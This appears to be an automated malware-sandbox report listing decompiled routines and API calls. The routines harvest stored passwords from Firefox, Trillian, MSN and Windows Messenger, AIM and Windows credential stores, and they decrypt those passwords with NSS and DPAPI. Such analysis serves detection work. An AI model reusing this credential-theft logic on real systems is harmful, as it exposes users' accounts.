                                          				char _v276;
                                          				void _v539;
                                          				char _v540;
                                          				void _v803;
                                          				char _v804;
                                          				void _v1067;
                                          				char _v1068;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t53;
                                          				signed int _t54;
                                          				int _t61;
                                          				int _t64;
                                          				int _t67;
                                          				void* _t71;
                                          				void* _t73;
                                          				void* _t75;
                                          				intOrPtr* _t76;
                                          				intOrPtr _t115;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t115 = _a4 + 4;
                                          				_v12 = _t115;
                                          				0x410c4c(); // executed
                                          				if(__eax != 0) {
                                          					_v1068 = 0;
                                          					memset( &_v1067, 0, 0x104);
                                          					E00406958(0x104,  &_v1068, _a8);
                                          					_t53 =  *(_t115 + 4);
                                          					if(_t53 == 0) {
                                          						_t54 = _t53 | 0xffffffff;
                                          						__eflags = _t54;
                                          					} else {
                                          						_t54 =  *_t53( &_v1068);
                                          					}
                                          					if(_t54 == 0) {
                                          						_v276 = 0;
                                          						memset( &_v275, 0, 0x104);
                                          						_v804 = 0;
                                          						memset( &_v803, 0, 0x104);
                                          						_v540 = 0;
                                          						memset( &_v539, 0, 0x104);
                                          						_t61 = strlen(_a8);
                                          						_t19 = strlen(0x4181fc) + 1; // 0x1
                                          						if(_t61 + _t19 >= 0x104) {
                                          							_v276 = 0;
                                          						} else {
                                          							E00406B4B( &_v276, _a8, 0x4181fc);
                                          						}
                                          						_t64 = strlen(_a8);
                                          						_t25 = strlen(0x418208) + 1; // 0x1
                                          						if(_t64 + _t25 >= 0x104) {
                                          							_v804 = 0;
                                          						} else {
                                          							E00406B4B( &_v804, _a8, 0x418208);
                                          						}
                                          						_t67 = strlen(_a8);
                                          						_t31 = strlen(0x418218) + 1; // 0x1
                                          						if(_t67 + _t31 >= 0x104) {
                                          							_v540 = 0;
                                          						} else {
                                          							E00406B4B( &_v540, _a8, 0x418218);
                                          						}
                                          						_t71 = E004069D3( &_v276);
                                          						_t131 = _t71;
                                          						if(_t71 != 0) {
                                          							E004062DB(_t131, _a4,  &_v276);
                                          						}
                                          						_t73 = E004069D3( &_v804);
                                          						_t132 = _t73;
                                          						if(_t73 != 0) {
                                          							E004062DB(_t132, _a4,  &_v804);
                                          						}
                                          						_t75 = E004069D3( &_v540);
                                          						_t133 = _t75;
                                          						if(_t75 != 0) {
                                          							E004062DB(_t133, _a4,  &_v540);
                                          						}
                                          						_t76 =  *((intOrPtr*)(_v12 + 8));
                                          						_v8 = 1;
                                          						if(_t76 != 0) {
                                          							 *_t76();
                                          						}
                                          					}
                                          					0x410d6f();
                                          				}
                                          				return _v8;
                                          			}

                                          APIs
                                            • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                            • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                            • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                            • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                            • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                            • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                            • Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                          • memset.MSVCRT ref: 00406537
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          • memset.MSVCRT ref: 0040657E
                                          • memset.MSVCRT ref: 00406596
                                          • memset.MSVCRT ref: 004065AE
                                          • strlen.MSVCRT ref: 004065B9
                                          • strlen.MSVCRT ref: 004065C7
                                          • strlen.MSVCRT ref: 004065F2
                                          • strlen.MSVCRT ref: 00406600
                                          • strlen.MSVCRT ref: 0040662B
                                          • strlen.MSVCRT ref: 00406639
                                            • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                            • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                            • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                            • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                            • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                            • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                            • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                            • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                            • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                          • String ID: signons.txt$signons2.txt$signons3.txt
                                          • API String ID: 4081699353-561706229
                                          • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                          • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                          • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                          • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E0040D3A0(char* _a4) {
                                          				void _v267;
                                          				char _v268;
                                          				void _v531;
                                          				char _v532;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t20;
                                          				int _t24;
                                          				char _t28;
                                          				void* _t39;
                                          				char* _t56;
                                          				char* _t60;
                                          				char* _t62;
                                          				char* _t63;
                                          				void* _t64;
                                          
                                          				_t56 = _a4;
                                          				 *_t56 = 0;
                                          				_v268 = 0;
                                          				_t20 = memset( &_v267, 0, 0x104);
                                          				_t60 =  &_v268;
                                          				0x411dae(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian", "UninstallString", 0x104); // executed
                                          				if(_t20 != 0) {
                                          					_t39 = E00407139(0, "trillian.exe");
                                          					if(_t39 > 0) {
                                          						 *((char*)(_t64 + _t39 - 0x109)) = 0;
                                          						if(E004069D3(_t60) != 0) {
                                          							0x413d0c(_t56, _t60);
                                          						}
                                          					}
                                          				}
                                          				if( *_t56 == 0) {
                                          					_v268 = 0;
                                          					0x41212c(); // executed
                                          					_t63 =  &_v268;
                                          					E0040680E(_t63);
                                          					E00406958(0x104, _t63, "trillian");
                                          					if(E004069D3(_t63) != 0) {
                                          						0x413d0c(_a4, _t63);
                                          					}
                                          				}
                                          				_v532 = 0;
                                          				memset( &_v531, 0, 0x104);
                                          				0x41223f(0x1a); // executed
                                          				_t62 = _a4 + 0x105;
                                          				_t24 = strlen("Trillian\users\global");
                                          				_t17 = strlen( &_v532) + 1; // 0x1
                                          				if(_t24 + _t17 >= 0x104) {
                                          					 *_t62 = 0;
                                          				} else {
                                          					E00406B4B(_t62,  &_v532, "Trillian\users\global");
                                          				}
                                          				_t28 = E004069D3(_t62);
                                          				if(_t28 == 0) {
                                          					 *_t62 = _t28;
                                          					return _t28;
                                          				}
                                          				return _t28;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0040D3C8
                                            • Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3
                                          • _mbscpy.MSVCRT ref: 0040D41B
                                          • _mbscpy.MSVCRT ref: 0040D464
                                          • memset.MSVCRT ref: 0040D47C
                                          • strlen.MSVCRT ref: 0040D49D
                                          • strlen.MSVCRT ref: 0040D4AB
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                            • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                            • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                          • API String ID: 2174551368-3003071570
                                          • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                          • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                          • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                          • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,73AFF420,00000000,?,0040DCC1,?), ref: 0041041E
                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,73AFF420,00000000,?,0040DCC1,?), ref: 00410436
                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,73AFF420,00000000,?,0040DCC1), ref: 0041045F
                                          • RegCloseKey.ADVAPI32(?,?,73AFF420,00000000,?,0040DCC1), ref: 00410509
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memcpy.MSVCRT ref: 004104C8
                                          • memcpy.MSVCRT ref: 004104DD
                                            • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                            • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
                                            • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                            • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                          • LocalFree.KERNEL32(0040DCC1,73AFF420,?,?,?,73AFF420,00000000), ref: 00410500
                                          • RegCloseKey.KERNELBASE(?,?,73AFF420,00000000,?,0040DCC1,?), ref: 00410512
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                          • API String ID: 2768085393-888555734
                                          • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                          • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                          • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                          • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID:
                                          • API String ID: 3662548030-0
                                          • Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                          • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                          • Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                          • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E0040DA79(intOrPtr* _a4) {
                                          				void* _v12;
                                          				int _v16;
                                          				intOrPtr _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				int _v32;
                                          				int _v36;
                                          				int _v40;
                                          				intOrPtr _v48;
                                          				char _v52;
                                          				int _v56;
                                          				int _v60;
                                          				char _v64;
                                          				intOrPtr _v76;
                                          				int _v84;
                                          				int _v88;
                                          				int _v344;
                                          				int _v600;
                                          				char _v856;
                                          				char _v1112;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				char* _t73;
                                          				long _t75;
                                          				void** _t76;
                                          				long _t78;
                                          				long _t80;
                                          				char* _t81;
                                          				long _t83;
                                          				char* _t84;
                                          				int _t96;
                                          				int _t115;
                                          				int* _t132;
                                          				int* _t134;
                                          				int* _t136;
                                          
                                          				_t115 = 0;
                                          				_v20 = 1;
                                          				_v76 = 0x418ad8;
                                          				_v64 = 0;
                                          				_v56 = 0;
                                          				_v60 = 0;
                                          				0x40fd01();
                                          				_v16 = 0;
                                          				do {
                                          					if(_v16 != _t115) {
                                          						if(_v16 != 1) {
                                          							_t73 =  &_v1112;
                                          							0x40ff88(_t73); // executed
                                          						} else {
                                          							_t75 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
                                          							if(_t75 != 0) {
                                          								goto L5;
                                          							} else {
                                          								_t76 =  &_v12;
                                          								goto L4;
                                          							}
                                          						}
                                          					} else {
                                          						_t78 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MSNMessenger", _t115, 0x20019,  &_v24); // executed
                                          						if(_t78 != 0) {
                                          							L5:
                                          							_t73 = 0;
                                          						} else {
                                          							_t76 =  &_v24;
                                          							L4:
                                          							_t73 =  &_v1112;
                                          							0x40fe5d(_t73, _t76);
                                          						}
                                          					}
                                          					if(_t73 != _t115) {
                                          						_v600 = _t115;
                                          						_v344 = _t115;
                                          						_v88 = _t115;
                                          						_v84 = _t115;
                                          						E00406958(0xff,  &_v344,  &_v856);
                                          						_t132 =  &_v600;
                                          						E00406958(0xff, _t132,  &_v1112);
                                          						_v84 = 1;
                                          						_v88 = 1;
                                          						 *((intOrPtr*)( *_a4))(_t132);
                                          						_t115 = 0;
                                          					}
                                          					_v16 = _v16 + 1;
                                          				} while (_v16 < 3);
                                          				_t80 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
                                          				if(_t80 != 0) {
                                          					_t81 = 0;
                                          				} else {
                                          					_t81 =  &_v1112;
                                          					0x40fd2e("UserMicrosoft RTC Instant Messaging", "PasswordMicrosoft RTC Instant Messaging", _t81,  &_v12);
                                          				}
                                          				if(_t81 != _t115) {
                                          					_v600 = _t115;
                                          					_v344 = _t115;
                                          					_v88 = _t115;
                                          					_v84 = _t115;
                                          					E00406958(0xff,  &_v344,  &_v856);
                                          					_t136 =  &_v600;
                                          					E00406958(0xff, _t136,  &_v1112);
                                          					_v84 = 9;
                                          					_v88 = 0xa;
                                          					_v20 =  *((intOrPtr*)( *_a4))(_t136);
                                          					_t115 = 0;
                                          				}
                                          				_t83 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
                                          				if(_t83 != 0) {
                                          					_t84 = 0;
                                          				} else {
                                          					_t84 =  &_v1112;
                                          					0x40fd2e("UserMicrosoft Exchange Instant Messaging", "PasswordMicrosoft Exchange Instant Messaging", _t84,  &_v12);
                                          				}
                                          				if(_t84 != _t115) {
                                          					_v600 = _t115;
                                          					_v344 = _t115;
                                          					_v88 = _t115;
                                          					_v84 = _t115;
                                          					E00406958(0xff,  &_v344,  &_v856);
                                          					_t134 =  &_v600;
                                          					E00406958(0xff, _t134,  &_v1112);
                                          					_t96 = 0xa;
                                          					_v84 = _t96;
                                          					_v88 = _t96;
                                          					_v20 =  *((intOrPtr*)( *_a4))(_t134);
                                          					_t115 = 0;
                                          				}
                                          				_v28 = _a4;
                                          				_v40 = _t115;
                                          				_v32 = _t115;
                                          				_v36 = _t115;
                                          				_v52 = 0x418ae0;
                                          				0x4103f1( &_v52); // executed
                                          				0x410205( &_v52);
                                          				if(_v48 == _t115) {
                                          					0x410383( &_v52); // executed
                                          				}
                                          				E00404CE0( &_v40);
                                          				E00404CE0( &_v64);
                                          				return _v20;
                                          			}

                                          APIs
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                            • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                            • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                            • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                          Strings
                                          • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                          • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                          • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                          • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                          • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                          • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Open$ByteCharMultiWidememset$FreeLocal
                                          • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                          • API String ID: 3472595403-3472580514
                                          • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                          • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
                                          • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                          • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E0040BBF0(void* __eax, intOrPtr _a4) {
                                          				void _v267;
                                          				char _v268;
                                          				char _v531;
                                          				char _v792;
                                          				intOrPtr _v796;
                                          				char _v800;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				char* _t31;
                                          				WINDOWPLACEMENT* _t43;
                                          				void* _t45;
                                          				char* _t49;
                                          				struct HWND__* _t50;
                                          				intOrPtr _t52;
                                          				int _t56;
                                          
                                          				_t45 = __eax;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				GetModuleFileNameA(0,  &_v268, 0x104);
                                          				_t31 = strrchr( &_v268, 0x2e);
                                          				if(_t31 != 0) {
                                          					 *_t31 = 0;
                                          				}
                                          				0x413cf4( &_v268, ".cfg");
                                          				_v796 = _a4;
                                          				_v800 = 0x419084;
                                          				_v792 = 0;
                                          				_v531 = 0;
                                          				0x413d0c( &_v792,  &_v268);
                                          				0x413d0c( &_v531, "General");
                                          				E004039A8( *((intOrPtr*)(_t45 + 0x38c)),  &_v800); // executed
                                          				_t52 = _v796;
                                          				_t56 = 0x2c;
                                          				if(_t52 != 0) {
                                          					_t50 =  *(_t45 + 0x108);
                                          					if(_t50 != 0) {
                                          						_t43 = _t45 + 0x144;
                                          						_t43->length = _t56;
                                          						GetWindowPlacement(_t50, _t43);
                                          					}
                                          				}
                                          				_t49 =  &_v800;
                                          				 *((intOrPtr*)(_v800 + 0xc))("WinPos", _t45 + 0x144, _t56);
                                          				if(_t52 == 0) {
                                          					E00402D81(_t45);
                                          				}
                                          				return E0040946F( *((intOrPtr*)(_t45 + 0x390)), _t49,  &_v800);
                                          			}




















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                          • String ID: .cfg$General$WinPos
                                          • API String ID: 1012775001-3165880290
                                          • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                          • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                          • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                          • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                          • memset.MSVCRT ref: 0040265A
                                          • memset.MSVCRT ref: 00402676
                                          • wcscpy.MSVCRT ref: 004026BD
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                          • RegCloseKey.ADVAPI32(?), ref: 00402724
                                          Strings
                                          • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$CloseEnumOpenValuewcscpy
                                          • String ID: Software\America Online\AIM6\Passwords
                                          • API String ID: 295685061-818317896
                                          • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                          • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                          • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                          • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E004039A8(void* __edi, intOrPtr* __esi) {
                                          				void _v259;
                                          				char _v260;
                                          				char _v2088;
                                          				void* _t40;
                                          				void* _t44;
                                          				void* _t47;
                                          				intOrPtr* _t68;
                                          				void* _t69;
                                          				void* _t70;
                                          
                                          				_t68 = __esi;
                                          				_t70 = _t69 - 0x824;
                                          				_t47 = 0;
                                          				_push(0);
                                          				_push(__edi + 0x728);
                                          				_push("ShowGridLines");
                                          				 *((intOrPtr*)( *__esi + 4))();
                                          				_push(0);
                                          				_push(__edi + 0x72c);
                                          				_push("SaveFilterIndex");
                                          				 *((intOrPtr*)( *__esi + 8))();
                                          				_push(0);
                                          				_push(__edi + 0x730);
                                          				_push("AddExportHeaderLine");
                                          				 *((intOrPtr*)( *__esi + 4))();
                                          				_push(0);
                                          				_push(__edi + 0x734);
                                          				_push("MarkOddEvenRows");
                                          				 *((intOrPtr*)( *__esi + 4))();
                                          				E0040D725(E0040D339( &_v2088), 0);
                                          				do {
                                          					_v260 = 0;
                                          					memset( &_v259, 0, 0xfe);
                                          					_push(_t47);
                                          					sprintf( &_v260, "Folder%d");
                                          					_t70 = _t70 + 0x18;
                                          					if( *((intOrPtr*)(_t68 + 4)) == 0) {
                                          						L4:
                                          						_t40 =  *((intOrPtr*)( *_t68 + 0x10))( &_v260, E0040D362(_t47), E0040D362(_t47), 0x104);
                                          					} else {
                                          						_t44 = E0040D362(_t47);
                                          						0x413dce(_t44, E0040D362(_t47));
                                          						if(_t44 != 0) {
                                          							goto L4;
                                          						} else {
                                          							_t40 =  *((intOrPtr*)( *_t68 + 0x1c))( &_v260);
                                          						}
                                          					}
                                          					_t47 = _t47 + 1;
                                          				} while (_t47 < 7);
                                          				return _t40;
                                          			}













                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpimemsetsprintf
                                          • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                          • API String ID: 1148023869-3238971583
                                          • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                          • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                          • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                          • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
                                            • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
                                            • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
                                            • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
                                          • memset.MSVCRT ref: 0040FA77
                                          • strlen.MSVCRT ref: 0040FA8E
                                          • strlen.MSVCRT ref: 0040FA97
                                          • strlen.MSVCRT ref: 0040FAF0
                                          • strlen.MSVCRT ref: 0040FAFE
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscatmemset$_mbscpy
                                          • String ID: history.dat$places.sqlite
                                          • API String ID: 29466866-467022611
                                          • Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                          • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
                                          • Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                          • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 42%
                                          			E004043E4() {
                                          				char _v11;
                                          				char _v12;
                                          				char _v13;
                                          				char _v14;
                                          				char _v15;
                                          				char _v16;
                                          				char _v17;
                                          				char _v18;
                                          				char _v19;
                                          				char _v20;
                                          				void _v283;
                                          				char _v284;
                                          				void _v556;
                                          				void* __edi;
                                          				void* __esi;
                                          				void _t33;
                                          				char* _t42;
                                          
                                          				_v284 = 0;
                                          				memset( &_v283, 0, 0x104);
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				asm("stosb");
                                          				if( *0x41e568 == 0) {
                                          					 *0x41e670 = GetSystemDirectoryA(0x41e568, 0x104);
                                          				}
                                          				0x413d0c( &_v284, 0x41e568);
                                          				E0040680E( &_v284);
                                          				if(E004028E7() == 0) {
                                          					_v11 = 0;
                                          					_v18 = 0x61;
                                          					_v15 = 0x2e;
                                          					_v14 = 0x65;
                                          					_v16 = 0x73;
                                          					_v12 = 0x65;
                                          					_v20 = 0x6c;
                                          					_v17 = 0x73;
                                          					_v19 = 0x73;
                                          					_v13 = 0x78;
                                          				}
                                          				_t17 =  &_v20; // 0x6c
                                          				_t42 =  &_v284;
                                          				E00406EFE(_t42, _t17);
                                          				0x411147();
                                          				 *0x41e010 = 0; // executed
                                          				0x411560(_t42); // executed
